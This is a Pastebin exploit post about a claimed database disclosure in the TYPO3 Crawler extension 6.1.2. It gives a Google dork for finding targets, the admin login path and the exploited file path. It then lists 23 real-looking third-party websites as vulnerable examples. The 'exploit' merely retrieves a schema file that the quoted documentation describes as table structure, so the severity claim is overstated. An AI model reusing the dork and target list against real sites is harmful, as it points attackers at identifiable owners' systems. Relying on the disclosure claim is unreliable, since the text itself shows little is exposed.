KingSkrupellos

Typo3 CMS Site Crawler Extension 6.1.2 Database Disclosure

Jan 5th, 2019
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.86 KB | None | 0 0
  1. ################################################################################
  2.  
  3. # Exploit Title : Typo3 CMS Site Crawler Extension 6.1.2 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 02/01/2019
  6. # Vendor Homepage : typo3.org
  7. # Software Download Link : extensions.typo3.org/extension/download/crawler/6.1.2/zip/
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 6.1.2
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/typo3conf/ext/crawler/''
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  15. # CxSecurity Exploit Reference Link :
  16. cxsecurity.com/issue/WLB-2019010031
  17. # PacketStormSecurity Exploit Reference Link :
  18. packetstormsecurity.com/files/150992/Typo3-CMS-Site-Crawler-6.1.2-Database-Disclosure.html
  19.  
  20. ################################################################################
  21.  
  22. # Admin Panel Login Path :
  23.  
  24. /typo3/index.php
  25.  
  26. # Exploit :
  27.  
  28. /typo3conf/ext/crawler/ext_tables.sql
  29.  
  30. ################################################################################
  31.  
  32. Information About Database =>
  33.  
  34. ext_tables.sql
  35. ************************
  36.  
  37. This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
  38.  
  39. This file should contain a table structure dump of the tables used by the extension.
  40.  
  41. It is used for evaluation of the database structure and is therefore important to check and update
  42.  
  43. the database when an extension is enabled. If you add additional fields (or depend on certain fields)
  44.  
  45. to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
  46.  
  47. for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
  48.  
  49. file may not necessarily be dumpable directly to MySQL (because of the semi-complete
  50.  
  51. table definitions allowed defining only required fields.). But the EM or
  52.  
  53. Install Tool can handle this. The only very important thing is that the syntax of the content
  54.  
  55. is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
  56.  
  57. ################################################################################
  58.  
  59. # Example Vulnerable Sites =>
  60.  
  61. [+] zbb.ch/typo3conf/ext/crawler/ext_tables.sql
  62.  
  63. [+] assenagon.com/typo3conf/ext/crawler/ext_tables.sql
  64.  
  65. [+] getadiy.de/typo3conf/ext/crawler/ext_tables.sql
  66.  
  67. [+] demo.szene-rostock.de/typo3conf/ext/crawler/ext_tables.sql
  68.  
  69. [+] 5zu3methode.de/typo3conf/ext/crawler/ext_tables.sql
  70.  
  71. [+] espaces-transfrontaliers.org/typo3conf/ext/crawler/ext_tables.sql
  72.  
  73. [+] lippewelle.de/typo3conf/ext/crawler/ext_tables.sql
  74.  
  75. [+] radinfo.at/typo3conf/ext/crawler/ext_tables.sql
  76.  
  77. [+] kanumagazin.de/typo3conf/ext/crawler/ext_tables.sql
  78.  
  79. [+] ki.si/typo3conf/ext/crawler/ext_tables.sql
  80.  
  81. [+] herbig.net/typo3conf/ext/crawler/ext_tables.sql
  82.  
  83. [+] efs.b4ydev.net/typo3conf/ext/crawler/ext_tables.sql
  84.  
  85. [+] plastipol.de/typo3conf/ext/crawler/ext_tables.sql
  86.  
  87. [+] aegerisee-schifffahrt.ch/typo3conf/ext/crawler/ext_tables.sql
  88.  
  89. [+] zugersee-schifffahrt.ch/typo3conf/ext/crawler/ext_tables.sql
  90.  
  91. [+] bulac.fr/typo3conf/ext/crawler/ext_tables.sql
  92.  
  93. [+] iholdi-oztibarre.com/typo3conf/ext/crawler/ext_tables.sql
  94.  
  95. [+] usva.nl/typo3conf/ext/crawler/ext_tables.sql
  96.  
  97. [+] radiosoft.com/typo3conf/ext/crawler/ext_tables.sql
  98.  
  99. [+] maska.si/typo3conf/ext/crawler/ext_tables.sql
  100.  
  101. [+] itd-cart.com/typo3conf/ext/crawler/ext_tables.sql
  102.  
  103. [+] radosina.sk/typo3conf/ext/crawler/ext_tables.sql
  104.  
  105. [+] hellweg-radio.de/typo3conf/ext/crawler/ext_tables.sql
  106.  
  107. ################################################################################
  108.  
  109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  110.  
  111. ################################################################################
Advertisement
Add Comment
Please, Sign In to add comment